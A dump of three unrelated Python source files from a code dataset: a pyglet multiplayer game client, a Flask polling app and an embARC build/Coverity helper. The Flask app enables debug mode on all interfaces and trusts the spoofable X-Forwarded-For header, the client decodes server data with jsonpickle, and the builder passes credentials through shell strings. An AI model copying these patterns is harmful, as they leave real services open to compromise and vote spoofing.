glooey.Grid(\n self.chunk_size[0], self.chunk_size[1], 32, 32\n ) # chunk_size + tilemap size\n self.map_grid.set_left_padding(32) # for the border.\n self.map_grid.set_top_padding(32)\n\n for i in range(\n self.chunk_size[0]\n ): # glooey uses x,y for grids from the top left.\n for j in range(self.chunk_size[1]):\n self.map_grid.add(\n i, j, glooey.images.Image(pyglet.resource.texture(\"t_grass.png\"))\n ) # before we get an update we need to init the map with grass.\n\n # insert the background into our ordered groups.\n self.insert(CustomBackground(), 0)\n\n # insert the map_grid into our ordered group.\n self.insert(self.map_grid, 1)\n\n # TODO: lerp the positions of creatures from one frame to the next.\n # self.old_map = self.localmap\n\n # our keep-alive event. without this the server would disconnect if we don't send data within the timeout for the server. (usually 60 seconds)\n # clock.schedule_interval(self.ping, 30.0)\n\n def ping(self, dt):\n command = Command(client.character.name, \"ping\")\n client.send(command)\n\n def find_character_in_localmap(self):\n for tile in self.localmap:\n if tile[\"creature\"] is not None:\n if tile[\"creature\"].name == self.character.name:\n return tile[\"creature\"]\n else:\n print(\"couldn't find character\")\n\n def convert_chunks_to_localmap(self, list_of_chunks):\n tiles = []\n for chunk in list_of_chunks:\n for tile in chunk.tiles:\n tiles.insert(len(tiles), tile)\n return tiles\n\n def lerp(self, start, end, t):\n return start + t * (end - start)\n\n def lerp_point(self, p0, p1, t):\n return (int(self.lerp(p0[0], p1[0], t)), int(self.lerp(p0[1], p1[1], t)))\n\n def diagonal_distance(self, p0, p1):\n dx = p1[0] - p0[0]\n dy = p1[1] - p0[1]\n return max(abs(dx), abs(dy))\n\n def line(self, p0, p1):\n points = []\n diagonal_distance = self.diagonal_distance(p0, p1)\n for step in range(diagonal_distance):\n points.append(self.lerp_point(p0, p1, step / diagonal_distance))\n return points # so now we have a set of points along a line.\n\n def trim_localmap(self, origin_position, radius=10):\n # origin_position = origin_position # store the player position for fov origin\n # convert chunks to grid\n level = defaultdict(dict)\n for tile in self.localmap[:]: # we only need the tiles around radius.\n if (\n int(tile[\"position\"].x) < origin_position.x - radius\n or int(tile[\"position\"].x) > origin_position.x + radius + 1\n ):\n self.localmap.remove(tile)\n elif (\n int(tile[\"position\"].y) < origin_position.y - radius\n or int(tile[\"position\"].y) > origin_position.y + radius + 1\n ):\n self.localmap.remove(tile)\n else:\n level[str(tile[\"position\"].x)][str(tile[\"position\"].y)] = tile[\n \"terrain\"\n ].impassable # so either remove a tile or figure out if it's impassable.\n\n # draw a line to each edge of the viewport using grid_edges\n # x's include top row and bottom rows, y's include min and max of viewport.\n grid_edges = []\n # now we have a level grid. let's get our edges so we can plot lines from origin to edge.\n for x in range(origin_position.x - radius, origin_position.x + radius + 1): # X\n grid_edges.append((x, origin_position.y - radius))\n grid_edges.append((x, origin_position.y + radius))\n for y in range(origin_position.y - radius, origin_position.y + radius + 1): # Y\n grid_edges.append((origin_position.x - radius, y))\n grid_edges.append((origin_position.x + radius, y))\n # print('grid_edges: ' + str(len(grid_edges)))\n\n tiles_to_keep = []\n # now we need to remove tiles which are out of our field of view.\n for destination in grid_edges:\n for point in self.line((origin_position.x, origin_position.y), destination):\n if level[str(point[0])][str(point[1])] == True: # (impassable)\n tiles_to_keep.append(\n point\n ) # do this to keep the blocking wall visible.\n break # hit a wall. move on to the next ray.\n else:\n tiles_to_keep.append(point)\n\n for tiles in self.localmap[:]: # iterate a copy to remove correctly.\n for point in tiles_to_keep:\n if tiles[\"position\"].x == point[0] and tiles[\"position\"].y == point[1]:\n break\n else:\n self.localmap.remove(tiles)\n\n def update_map_for_position(self, position):\n if self.localmap is not None:\n # our map_grid is 13x13 but our localmap contains 13*3 x 13*3 tiles worth of chunks so we need\n # to draw the viewport from the position only 13x13\n position = self.convert_position_to_local_coords(position)\n # first set terrain to the terrain image\n for tile in self.localmap:\n _pos = self.convert_position_to_local_coords(\n tile[\"position\"]\n ) # (0-38, 0-38)\n x = _pos.x - position.x + 6\n y = _pos.y - position.y + 6\n if x < 0 or x > 12:\n continue\n if y < 0 or y > 12:\n continue\n self.map_grid[x, y].set_image(\n pyglet.resource.texture(tile[\"terrain\"].ident + \".png\")\n ) # must be (0-12, 0-12)\n\n # then overlay furniture on that.\n if tile[\"furniture\"] is not None:\n self.map_grid[x, y].set_image(\n pyglet.resource.texture(tile[\"furniture\"].ident + \".png\")\n )\n\n # then overlay items on that.\n if tile[\"items\"] is not None and len(tile[\"items\"]) > 0:\n self.map_grid[x, y].set_image(\n pyglet.resource.texture(tile[\"items\"][0].ident + \".png\")\n ) # just show the first item\n\n # then overlay creatures on that.\n if tile[\"creature\"] is not None:\n self.map_grid[x, y].set_image(\n pyglet.resource.texture(tile[\"creature\"].tile_ident + \".png\")\n )\n\n # print(\"FPS:\", pyglet.clock.get_fps())\n\n def convert_position_to_local_coords(self, position):\n # local coordinates are always from (0,0) to (chunk.size[1] * 3 , chunk.size[0] * 3)\n # and must return a position within that size.\n x = position.x\n y = position.y\n z = position.z\n\n while x >= self.chunk_size[0] * 3:\n x = x - self.chunk_size[0] * 3\n while y >= self.chunk_size[1] * 3:\n y = y - self.chunk_size[1] * 3\n\n return Position(x, y, z)\n\n def draw_view_at_position(self, draw_position):\n self.trim_localmap(draw_position) # update field of view and lighting\n\n # at this point the localmap should've been trimmed of unseeable tiles. draw what's left at position.\n for tile in self.localmap: # draw the localmap for the controlling player.\n terrain = tile[\"terrain\"]\n position = tile[\"position\"] # Position(x, y, z)\n creature = tile[\"creature\"] # Creature()\n furniture = tile[\"furniture\"] # Furniture()\n items = tile[\"items\"] # list [] of Item()\n light_intensity = tile[\"lumens\"]\n\n fg = self.TileManager.TILE_TYPES[terrain.ident][\"fg\"]\n bg = self.TileManager.TILE_TYPES[terrain.ident][\"bg\"]\n\n x = (\n draw_position.x - position.x - (self.chunk_size[0] // 2)\n ) # offset to put position in middle of viewport\n y = (\n draw_position.y - position.y - (self.chunk_size[1] // 2)\n ) # offset to put position in middle of viewport\n\n \"\"\"# first blit terrain\n \n # then blit furniture\n \n\n # then blit items (if there is a pile of items check and see if any are blueprints. if so show those.)\n if(len(items) > 0):\n for item in items:\n # always show blueprints on top.\n else:\n # only display the first item \n \n # then blit vehicles\n\n # then blit player and creatures and monsters (all creature types)\n \"\"\"\n # darken based on lumen level of the tile\n # light_intensity # 10 is max light level although lumen level may be higher.\n # light_intensity = min(int((255-(light_intensity*25))/3), 255)\n # light_intensity = max(light_intensity, 0)\n # self.screen.fill((light_intensity, light_intensity, light_intensity), rect=(x*24, y*24, 24, 24), special_flags=pygame.BLEND_SUB)\n\n # render debug text\n\n # then blit weather. Weather is the only thing above players and creatures.\n # TODO: blit weather\n\n def open_crafting_menu(self):\n list_of_known_recipes = []\n for (\n key,\n value,\n ) in (\n self.RecipeManager.RECIPE_TYPES.items()\n ): # TODO: Don't just add them all. Pull them from creature.known_recipes\n list_of_known_recipes.append(value)\n\n def open_movement_menu(self, pos, tile):\n # _command = Command(client.character.name, 'calculated_move', (tile['position'].x, tile['position'].y, tile['position'].z))\n # send calculated_move action to server and give it the position of the tile we clicked.\n # return _command\n pass\n\n def open_super_menu(self, pos, tile):\n pass\n\n def open_blueprint_menu(self, pos, tile):\n # blueprint_menu = Blueprint_Menu(self.screen, (0, 0, 400, 496), self.FontManager, self.TileManager)\n pass\n\n def open_equipment_menu(self):\n # equipment_menu = Equipment_Menu(self.screen, (0, 0, 400, 496), self.FontManager, self.TileManager, self.character.body_parts)\n pass\n\n def open_items_on_ground(self, pos, tile):\n # _command = Command(self.character.name, 'move_item_to_player_storage', (tile['position'].x, tile['position'].y, tile['position'].z, item.ident)) # ask the server to pickup the item by ident. #TODO: is there a better way to pass it to the server without opening ourselves up to cheating?\n # return _command\n pass\n\n\nclass Client(MastermindClientTCP): # extends MastermindClientTCP\n def __init__(self):\n self.state = \"login\" # character_select, character_gen, main\n MastermindClientTCP.__init__(self)\n\n self.window = pyglet.window.Window(896, 498)\n self.client_name = ''\n\n pyglet.gl.glEnable(pyglet.gl.GL_BLEND)\n pyglet.gl.glBlendFunc(pyglet.gl.GL_SRC_ALPHA, pyglet.gl.GL_ONE_MINUS_SRC_ALPHA)\n\n self.gui = glooey.Gui(self.window)\n\n self.bg = glooey.Background()\n self.bg.set_appearance(\n center=pyglet.resource.texture(\"center.png\"),\n top=pyglet.resource.texture(\"top.png\"),\n bottom=pyglet.resource.texture(\"bottom.png\"),\n left=pyglet.resource.texture(\"left.png\"),\n right=pyglet.resource.texture(\"right.png\"),\n top_left=pyglet.resource.texture(\"top_left.png\"),\n top_right=pyglet.resource.texture(\"top_right.png\"),\n bottom_left=pyglet.resource.texture(\"bottom_left.png\"),\n bottom_right=pyglet.resource.texture(\"bottom_right.png\"),\n )\n\n self.gui.add(self.bg)\n\n self.TileManager = TileManager\n self.ItemManager = ItemManager\n self.RecipeManager = RecipeManager\n\n # TODO: make new hotbar in pyglet.\n self.hotbars = []\n\n self.LoginWindow = LoginWindow()\n self.LoginWindow.grid[6, 1].push_handlers(on_click=self.login) # Connect Button\n\n self.gui.add(self.LoginWindow)\n\n self.character = None\n self.localmap = None\n\n # init but don't show the window\n self.mainWindow = mainWindow\n\n # if we recieve an update from the server process it. do this first.\n # We always start out at the login window.\n # once we recieve a list of characters SWITCH to the character select view.\n # once the user selects a character ask the server to login into the world with it.\n # once we recieve a world state SWITCH to the mainWindow. client.character and localmap should be filled.\n def check_messages_from_server(self, dt):\n # commands recieved while in the login window\n next_update = client.receive(False)\n if self.state == \"login\":\n # we recieved a message from the server. let's process it.\n if next_update is not None:\n print(\"--next_update in login--\")\n print(type(next_update))\n if isinstance(next_update, list):\n # list of characters.\n print(\"list:\", next_update)\n # open the character select screen.\n self.gui.clear()\n self.gui.add(CustomBackground())\n self.CharacterSelectWindow = CharacterSelectWindow(next_update)\n self.CharacterSelectWindow.create_button.push_handlers(\n on_click=self.create_new_character\n )\n self.gui.add(self.CharacterSelectWindow)\n self.state = \"character_select\"\n\n if isinstance(next_update, str):\n if next_update == \"disconnect\":\n self.disconnect()\n return\n\n if isinstance(next_update, str):\n print(next_update)\n # server sent salt\n _hashedPW = hashPassword(\n self.LoginWindow.password.text, next_update\n )\n command = Command(\n self.LoginWindow.username.text,\n \"hashed_password\",\n [str(_hashedPW)],\n )\n # send back hashed password.\n self.send(command)\n\n if self.state == \"character_select\":\n if next_update is not None:\n print(\"--next_update in character_select--\")\n if isinstance(next_update, list):\n # list of characters.\n print(\"list:\", next_update)\n # re-fresh the character select screen.\n self.gui.clear()\n\n self.gui.add(CustomBackground())\n self.CharacterSelectWindow = CharacterSelectWindow(next_update)\n self.CharacterSelectWindow.create_button.push_handlers(\n on_click=self.create_new_character\n )\n self.gui.add(self.CharacterSelectWindow)\n for button in self.CharacterSelectWindow.vbox_for_characterlist:\n if button.text != \"Create a Character\":\n button.push_handlers(\n on_click=lambda w: self.choose_character(w.text)\n )\n\n if self.state == \"main\":\n self.gui.clear()\n self.gui.add(self.mainWindow())\n print(\"--in state main--\")\n print(self.localmap)\n if next_update is not None:\n print(\"next_update in main\", next_update)\n # we recieved a localmap from the server.\n self.localmap = jsonpickle.decode(next_update)\n\n if self.state == \"character_gen\":\n if next_update is not None:\n print(\"--next_update in character_gen--\")\n # print(next_update)\n\n def choose_character(self, name):\n self.state = \"main\"\n command = Command(self.client_name, \"choose_character\", [name])\n self.send(command)\n\n def create_new_character(self, dt):\n # switch to the character generation screen\n self.gui.clear()\n\n # init a blank character for us to send.\n self.character = Character()\n\n self.gui.add(CustomBackground())\n self.CharacterGenerationWindow = CharacterGenerationWindow()\n self.CharacterGenerationWindow.finish_button.push_handlers(\n on_click=self.send_completed_character\n )\n\n self.gui.add(self.CharacterGenerationWindow)\n self.state = \"character_gen\"\n\n def send_completed_character(self, dt):\n # gather up all the character info from the chargen window and send it. the 'commit' button\n\n self.character.name = self.CharacterGenerationWindow.main_frame.get_child()[0, 1].text\n self.character.gender = self.CharacterGenerationWindow.main_frame.get_child()[0, 3].text\n _data = jsonpickle.encode(self.character)\n\n # set this before sending the command to keep things in order.\n self.state = \"character_select\"\n\n command = Command(self.client_name, \"completed_character\", [_data])\n self.send(command)\n # go back to the charcterSelectWindow and update it with the new character and let them select it.\n\n def login(self, dt):\n # we'll do the below to login and recieve a list of characters.\n self.connect(\n self.LoginWindow.serverIP.text, int(self.LoginWindow.serverPort.text)\n )\n\n # set our client_name for future sending.\n self.client_name = self.LoginWindow.username.text \n \n command = Command(self.LoginWindow.username.text, \"login\", [\"noargs\"])\n self.send(command)\n # -------------------------------------------------------\n clock.schedule_interval(self.check_messages_from_server, 0.1)\n\n # our keep-alive event. without this the server would disconnect if we don't send data within the timeout for the server. (usually 60 seconds)\n # clock.schedule_interval(self.ping, 30.0)\n def ping(self, dt):\n command = Command(self.username, \"ping\")\n client.send(command)\n\n\n#\n# if we start a client directly\n#\nif __name__ == \"__main__\":\n\n client = Client()\n\n pyglet.app.event_loop.run() # main event loop starts here.\n\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":36104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"417891784","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sqlite3\nimport time\nfrom flask import *\n\napp = Flask(__name__)\napp.config.update(dict(\n DATABASE=os.path.join(app.root_path, 'db/main.db'),\n HOST='0.0.0.0',\n DEBUG=True,\n SECRET_KEY=os.urandom(24)\n))\n\n\ndef connect_db():\n return sqlite3.connect(app.config['DATABASE'])\n\n\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n\n@app.teardown_request\ndef teardown_request(exception):\n g.db.close()\n\n\ndef query_db(query, args=(), one=False):\n cur = g.db.execute(query, args)\n rv = [dict((cur.description[idx][0], value) for idx, value in enumerate(row)) for row in cur.fetchall()]\n return (rv[0] if rv else None) if one else rv\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\n\n@app.route('/polls/', methods=['GET'])\ndef poll(id):\n p = query_db('select * from polls where id = ?', [id], one=True)\n if p is None:\n abort(404)\n ip = request.remote_addr\n if request.headers.getlist(\"X-Forwarded-For\"):\n ip = request.headers.getlist(\"X-Forwarded-For\")[0]\n v = query_db('select * from votes where poll_id = ? and ip = ?', [id, ip])\n options = query_db('select * from options where poll_id = ?', [id])\n if v:\n total = 0\n for i in options:\n total += i['voters']\n x = time.localtime(p['create_at'])\n create_at = time.strftime('%Y-%m-%d %H:%M:%S', x)\n return render_template('result.html', poll=p, options=options, total=total, create_at=create_at)\n else:\n return render_template('poll.html', poll=p, options=options)\n\n\n@app.route('/polls', methods=['POST'])\ndef create():\n question = request.form.get('question', '')\n i = 1\n options = {}\n while request.form.get('option-' + str(i)) is not None:\n option = request.form.get('option-' + str(i))\n if option != \"\":\n options['option-' + str(i)] = option\n i += 1\n cur = g.db.cursor()\n cur.execute('insert into polls (question, is_multi, create_at) VALUES (?, ?, ?)',\n [question, False, int(time.time())])\n g.db.commit()\n row_id = cur.lastrowid\n i = 0\n for j in options:\n i += 1\n g.db.execute('insert into options (poll_id, option, content) VALUES (?, ?, ?)', [row_id, i, options[j]])\n g.db.commit()\n return redirect(url_for('poll', id=row_id))\n\n\n@app.route('/polls/', methods=['POST'])\ndef vote(id):\n ip = request.remote_addr\n if request.headers.getlist(\"X-Forwarded-For\"):\n ip = request.headers.getlist(\"X-Forwarded-For\")[0]\n option = request.form.get('option', '1')\n v = query_db('select * from votes where poll_id = ? and ip = ?', [id, ip])\n if v:\n return redirect(url_for(\"poll\", id=id))\n g.db.execute('insert into votes (poll_id, option_id, ip) VALUES (?, ?, ?)', [id, option, ip])\n v = query_db('select voters from options where poll_id = ? and option = ?', [id, option], one=True)\n g.db.execute('update options set voters = ? where poll_id = ? and option = ?', [v['voters'] + 1, id, option])\n g.db.commit()\n return redirect(url_for(\"poll\", id=id))\n\n\n@app.route('/ip', methods=['GET'])\ndef ip():\n ip = \"\"\n if request.headers.getlist(\"X-Forwarded-For\"):\n ip = request.headers.getlist(\"X-Forwarded-For\")[0]\n else:\n ip = request.remote_addr\n return str(ip)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413502797","text":"from __future__ import print_function, unicode_literals\nimport sys\nimport os\nimport time\nimport collections\nfrom ..settings import BUILD_CONFIG_TEMPLATE, BUILD_OPTION_NAMES, BUILD_INFO_NAMES, BUILD_CFG_NAMES, BUILD_SIZE_SECTION_NAMES, get_config, MAKEFILENAMES\nfrom ..utils import mkdir, delete_dir_files, cd, generate_json, pqueryOutputinline, pqueryTemporaryFile\nfrom ..notify import (print_string, print_table)\nfrom ..osp import osp\nfrom ..builder import secureshield\n\n\nclass embARC_Builder(object):\n def __init__(self, osproot=None, buildopts=None, outdir=None, embarc_config=\"embarc_app.json\"):\n self.buildopts = dict()\n make_options = ' '\n if osproot is not None and os.path.isdir(osproot):\n self.osproot = os.path.realpath(osproot)\n self.buildopts[\"EMBARC_OSP_ROOT\"] = self.osproot\n # make_options += 'EMBARC_ROOT=' + str(self.osproot) + ' '\n else:\n self.osproot = None\n if outdir is not None:\n self.outdir = os.path.realpath(outdir)\n make_options += 'OUT_DIR_ROOT=' + str(self.outdir) + ' '\n else:\n self.outdir = None\n\n if buildopts is not None:\n self.buildopts.update(buildopts)\n self.make_options = make_options\n self.embarc_config = embarc_config\n\n @staticmethod\n def is_embarc_makefile(app):\n with open(app) as f:\n embarc_root = False\n appl = False\n lines = f.read().splitlines()\n for line in lines:\n if \"EMBARC_ROOT\" in line:\n embarc_root = True\n if \"APPL\" in line:\n appl = True\n if embarc_root and appl:\n return True\n return False\n\n @staticmethod\n def build_common_check(app):\n build_status = {'result': True, 'reason': ''}\n app_normpath = os.path.normpath(app)\n if not os.path.isdir(app_normpath):\n build_status['reason'] = 'Application folder doesn\\'t exist!'\n build_status['result'] = False\n current_makefile = None\n for makename in MAKEFILENAMES:\n if makename in os.listdir(app_normpath):\n current_makefile = os.path.join(app_normpath, makename)\n break\n if not current_makefile:\n build_status['reason'] = 'Application makefile donesn\\'t exist!'\n build_status['result'] = False\n else:\n if not embARC_Builder.is_embarc_makefile(current_makefile):\n build_status['reason'] = 'Application makefile is invalid!'\n build_status['result'] = False\n\n app_realpath = os.path.realpath(app_normpath)\n build_status['app_path'] = app_realpath\n\n return app_realpath, build_status\n\n def configCoverity(self, toolchain):\n print_string(\"Config coverity\")\n build_status = {'result': True, 'reason': ''}\n self.coverity_comptype = 'gcc'\n self.coverity_compiler = 'arc-elf32-gcc'\n if toolchain == \"gnu\":\n pass\n elif toolchain == \"mw\":\n self.coverity_comptype = 'clangcc'\n self.coverity_compiler = 'ccac'\n else:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \"Toolchian is not supported!\"\n return build_status\n self.coverity_sa_version = os.environ.get(\"COVERITY_SA_VERSION\", None)\n self.coverity_server = os.environ.get(\"COVERITY_SERVER\", None)\n self.user = os.environ.get(\"AUTO_USER\", None)\n self.password = os.environ.get(\"AUTO_PASSWORD\", None)\n self.coverity_steam_pre = os.environ.get(\"COVERITY_STREAM_PRE\", None)\n return build_status\n\n def _setCoverityDirs(self, app):\n app_path_list = app.split(\"/\")\n self.coverity_steam = self.coverity_steam_pre + \"_\".join(app_path_list[1:])\n # print_string(\"The coverity stream: {} {} {} \".format(self.coverity_steam))\n self.coverity_data_dir = os.environ.get(\"COVERITY_DATA_DIR\", \"coverity-data\")\n self.coverity_config = os.path.join(self.coverity_data_dir, \"coverity-config.xml\")\n self.coverity_html = \"coverity_html\"\n if os.path.exists(self.coverity_data_dir):\n delete_dir_files(self.coverity_data_dir, dir=True)\n mkdir(self.coverity_data_dir)\n if os.path.exists(self.coverity_html):\n delete_dir_files(self.coverity_html, dir=True)\n\n def build_coverity(self, make_cmd):\n build_status = {'result': True, 'reason': ''}\n print_string(\"BEGIN SECTION Configure Coverity to use the built-incompiler\")\n config_compilercmd = \"cov-configure --config {} --template --comptype {} --compiler {}\".format(\n self.coverity_config,\n self.coverity_comptype, self.coverity_compiler\n )\n returncode = os.system(config_compilercmd)\n if returncode != 0:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \"Configure Coverity Failed!\"\n return build_status\n\n print_string(\"BEGIN SECTION Build with Coverity {}\".format(self.coverity_sa_version))\n coverity_build = \"cov-build --config %s --dir %s %s\" % (self.coverity_config, self.coverity_data_dir, make_cmd)\n try:\n build_proc = pqueryOutputinline(coverity_build, console=True)\n build_status['build_msg'] = build_proc\n except Exception as e:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \"Build with Coverity Failed! {}\".format(e)\n return build_status\n\n print_string(\"BEGIN SECTION Coverity Analyze Defects\")\n coverity_analyze = \"cov-analyze --dir {}\".format(self.coverity_data_dir)\n returncode = os.system(coverity_analyze)\n if returncode != 0:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \"Coverity Analyze Defects Failed!\"\n return build_status\n\n print_string(\"BEGIN SECTION Coverity Format Errors into HTML\")\n coverity_errors = \"cov-format-errors --dir %s -x -X --html-output %s\" % (self.coverity_data_dir, self.coverity_html)\n returncode = os.system(coverity_errors)\n if returncode != 0:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \"Coverity Format Errors into HTML Failed!\"\n return build_status\n\n print_string(\"BEGIN SECTION Coverity Commit defects to {} steam {}\".format(self.coverity_server, self.coverity_steam))\n coverity_commit = \"cov-commit-defects --dir %s --host %s --stream %s --user %s --password %s\" % (\n self.coverity_data_dir,\n self.coverity_server, self.coverity_steam, self.user, self.password\n )\n returncode = os.system(coverity_commit)\n if returncode != 0:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \"Coverity Commit defects Failed!\"\n return build_status\n\n '''print_string(\"BEGIN SECTION Coverity Send E-mail Notifications\")\n coverity_manage = \"cov-manage-im --mode notification --execute --view 'Default' --host %s --user %s --password %s\" % (\n self.coverity_server,\n self.user, self.password\n )\n returncode = os.system(coverity_manage)\n if returncode != 0:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \" Coverity Send E-mail Notifications Failed!\"\n return build_status'''\n\n return build_status\n\n def get_build_cmd(self, app, target=None, parallel=8, silent=False):\n build_status = dict()\n build_precmd = \"make \"\n if parallel:\n build_precmd = \"{} -j {}\".format(build_precmd, str(parallel))\n\n if target != \"info\":\n build_config_template = self.get_build_template()\n with cd(app):\n self.get_makefile_config(build_config_template)\n build_precmd = \"{} {}\".format(build_precmd, self.make_options)\n if silent:\n if \"SILENT=1\" not in build_precmd:\n build_precmd = \"{} SILENT=1 \".format(build_precmd)\n if isinstance(target, str) or target is not None:\n build_cmd = build_precmd + \" \" + str(target)\n else:\n build_status['reason'] = \"Unrecognized build target\"\n build_status['result'] = False\n return build_status\n build_cmd_list = build_cmd.split()\n for i in range(len(build_cmd_list)):\n if build_cmd_list[i].startswith(\"EMBARC_ROOT\"):\n build_cmd_list[i] = \"EMBARC_ROOT=\" + self.osproot\n break\n build_cmd = \" \".join(build_cmd_list)\n print_string(\"Build command: {} \".format(build_cmd))\n build_status['build_cmd'] = build_cmd\n return build_status\n\n def build_target(self, app, target=None, parallel=8, coverity=False, silent=False):\n app_realpath, build_status = self.build_common_check(app)\n build_status['build_target'] = target\n build_status['time_cost'] = 0\n print_string(\"Build target: {} \" .format(target))\n\n if not build_status['result']:\n return build_status\n\n # Check and create output directory\n if (self.outdir is not None) and (not os.path.isdir(self.outdir)):\n print_string(\"Create application output directory: \" + self.outdir)\n os.makedirs(self.outdir)\n\n current_build_cmd = self.get_build_cmd(app_realpath, target, parallel, silent)\n build_status.update(current_build_cmd)\n build_cmd = build_status.get('build_cmd', None)\n\n def start_build(build_cmd, build_status=None):\n print_string(\"Start to build application\")\n return_code = 0\n time_pre = time.time()\n if coverity:\n with cd(app_realpath):\n self._setCoverityDirs(app)\n coverity_build_status = self.build_coverity(build_cmd)\n if not coverity_build_status[\"result\"]:\n build_status[\"result\"] = False\n build_status[\"reason\"] = coverity_build_status[\"reason\"]\n build_status[\"build_msg\"] = coverity_build_status[\"build_msg\"]\n else:\n build_status[\"build_msg\"] = [\"Build Coverity successfully\"]\n else:\n if target not in [\"opt\", \"info\", \"size\", \"all\"]:\n with cd(app_realpath):\n try:\n return_code = os.system(build_cmd)\n if return_code == 0:\n build_status[\"build_msg\"] = [\"Build successfully\"]\n else:\n build_status[\"build_msg\"] = [\"Build failed\"]\n build_status['result'] = False\n build_status[\"reason\"] = \"ProcessError: Run command {} failed\".format(build_cmd)\n except (KeyboardInterrupt):\n print_string(\"Terminate batch job\", \"warning\")\n sys.exit(1)\n else:\n try:\n build_proc = pqueryOutputinline(build_cmd, cwd=app, console=True)\n build_status['build_msg'] = build_proc\n except Exception as e:\n print(\"Run command({}) failed! {} \".format(build_cmd, e))\n build_status[\"build_msg\"] = [\"Build failed\"]\n build_status[\"reason\"] = \"ProcessError: Run command {} failed\".format(build_cmd)\n build_status['result'] = False\n build_status['time_cost'] = (time.time() - time_pre)\n return build_status\n\n secureshield_config = secureshield.common_check(\n self.buildopts[\"TOOLCHAIN\"], self.buildopts[\"BOARD\"], app_realpath)\n if secureshield_config:\n with secureshield.secureshield_appl_cfg_gen(self.buildopts[\"TOOLCHAIN\"], secureshield_config, app_realpath):\n build_cmd_list = build_cmd.split()\n target = build_cmd_list[-1]\n build_cmd_list[-1] = \"USE_SECURESHIELD_APPL_GEN=1\"\n build_cmd_list.append(target)\n build_cmd = \" \".join(build_cmd_list)\n build_status = start_build(build_cmd, build_status)\n else:\n build_status = start_build(build_cmd, build_status)\n print_string(\"Completed in: ({})s \".format(build_status['time_cost']))\n return build_status\n\n def get_build_info(self, app, parallel=False):\n build_status = self.build_target(app, target=str('opt'), parallel=parallel)\n if not build_status['result']:\n return build_status\n\n build_cfg = dict()\n cfg_lines = build_status['build_msg']\n\n for cfg_line in cfg_lines:\n words = cfg_line.split(':')\n if len(words) == 2:\n key = words[0].strip()\n value = words[1].strip()\n if key in BUILD_CFG_NAMES or key in BUILD_OPTION_NAMES:\n build_cfg[key] = value\n\n build_status['build_cfg'] = build_cfg\n\n # Get Build Info\n info_status = self.build_target(app, target=str('info'))\n build_out = info_status['build_msg']\n build_info = dict()\n if info_status['result']:\n for info_line in build_out:\n words = info_line.split(':')\n if len(words) == 2:\n key = words[0].strip()\n value = words[1].strip()\n if key in BUILD_INFO_NAMES:\n build_info[key] = value\n if key == 'BUILD_OPTION':\n build_cfgs_dict = value.split()\n for cfg_dict in build_cfgs_dict:\n cfg_pair = cfg_dict.split('=')\n if len(cfg_pair) == 2 and cfg_pair[0] in BUILD_OPTION_NAMES:\n build_status['build_cfg'][cfg_pair[0]] = cfg_pair[1]\n if key == 'MIDDLEWARE' or key == 'PERIPHERAL':\n build_info[key + 'S'] = value.split()\n if key == 'APPLICATION_ELF':\n build_info['APPLICATION_OUTDIR'] = os.path.dirname(value)\n build_status['build_info'] = build_info\n\n app_realpath = build_status['app_path']\n if 'EMBARC_ROOT' in build_status['build_cfg']:\n if not os.path.isabs((build_status['build_cfg']['EMBARC_ROOT'])):\n build_status['build_cfg']['EMBARC_ROOT'] = os.path.realpath(os.path.join(app_realpath, build_status['build_cfg']['EMBARC_ROOT']))\n if 'OUT_DIR_ROOT' in build_status['build_cfg']:\n if not os.path.isabs(build_status['build_cfg']['OUT_DIR_ROOT']):\n build_status['build_cfg']['OUT_DIR_ROOT'] = os.path.realpath(os.path.join(app_realpath, build_status['build_cfg']['OUT_DIR_ROOT']))\n if 'OUT_DIR_ROOT' in build_status['build_info']:\n if not os.path.isabs(build_status['build_info']['OUT_DIR_ROOT']):\n build_status['build_info']['OUT_DIR_ROOT'] = os.path.realpath(os.path.join(app_realpath, build_status['build_info']['OUT_DIR_ROOT']))\n if 'APPLICATION_ELF' in build_status['build_info']:\n if not os.path.isabs(build_status['build_info']['APPLICATION_ELF']):\n build_status['app_elf'] = os.path.realpath(os.path.join(app_realpath, build_status['build_info']['APPLICATION_ELF']))\n else:\n build_status['app_elf'] = build_status['build_info']['APPLICATION_ELF']\n if 'APPLICATION_HEX' in build_status['build_info']:\n if not os.path.isabs(build_status['build_info']['APPLICATION_HEX']):\n build_status['app_hex'] = os.path.realpath(os.path.join(app_realpath, build_status['build_info']['APPLICATION_HEX']))\n else:\n build_status['app_hex'] = build_status['build_info']['APPLICATION_HEX']\n if 'APPLICATION_BIN' in build_status['build_info']:\n if not os.path.isabs(build_status['build_info']['APPLICATION_BIN']):\n build_status['app_bin'] = os.path.realpath(os.path.join(app_realpath, build_status['build_info']['APPLICATION_BIN']))\n else:\n build_status['app_bin'] = build_status['build_info']['APPLICATION_BIN']\n if 'APPLICATION_OUTDIR' in build_status['build_info']:\n if not os.path.isabs(build_status['build_info']['APPLICATION_OUTDIR']):\n build_status['app_outdir'] = os.path.realpath(os.path.join(app_realpath, build_status['build_info']['APPLICATION_OUTDIR']))\n else:\n build_status['app_outdir'] = build_status['build_info']['APPLICATION_OUTDIR']\n\n return build_status\n\n def build_elf(self, app, parallel=False, pre_clean=False, post_clean=False, silent=False):\n # Clean Application before build if requested\n if pre_clean:\n build_status = self.build_target(app, parallel=parallel, target=str('clean'))\n if not build_status['result']:\n return build_status\n\n # Build Application\n build_status = self.build_target(app, parallel=parallel, target=str('all'), silent=silent)\n if not build_status['result']:\n return build_status\n # Clean Application after build if requested\n if post_clean:\n clean_status = self.build_target(app, parallel=parallel, target=str('clean'))\n if not clean_status['result']:\n return clean_status\n\n return build_status\n\n def build_bin(self, app, parallel=False, 